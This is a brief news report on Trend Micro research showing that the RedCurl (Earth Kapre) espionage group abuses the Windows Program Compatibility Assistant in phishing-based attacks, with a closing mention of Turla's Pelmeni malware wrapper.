Cyberespionage operations by Russian hacking group RedCurl, also known as Red Wolf and Earth Kapre, have been concealed with the exploitation of the Windows Program Compatibility Assistant tool, which was initially intended for managing compatibility concerns with older programs, according to The Hacker News.
Malicious .ISO and .IMG attachments within phishing emails delivered by RedCurl trigger a multi-stage attack that runs an executable to enable curl utility downloading and loader delivery, a report from Trend Micro showed. Windows PCA is then leveraged by the loader to facilitate another downloader process of the attack, which also involved Impacket exploitation for unauthorized command execution. The findings indicate RedCurl's continuous efforts to obfuscate malicious operations, researchers said. "This case underscores the ongoing and active threat posed by Earth Kapre, a threat actor that targets a diverse range of industries across multiple countries," added researchers. Such a report follows a Lab52 study revealing Russian state-sponsored threat operation Turla's utilization of the novel Pelmeni wrapper DLL for Kazuar malware distribution.
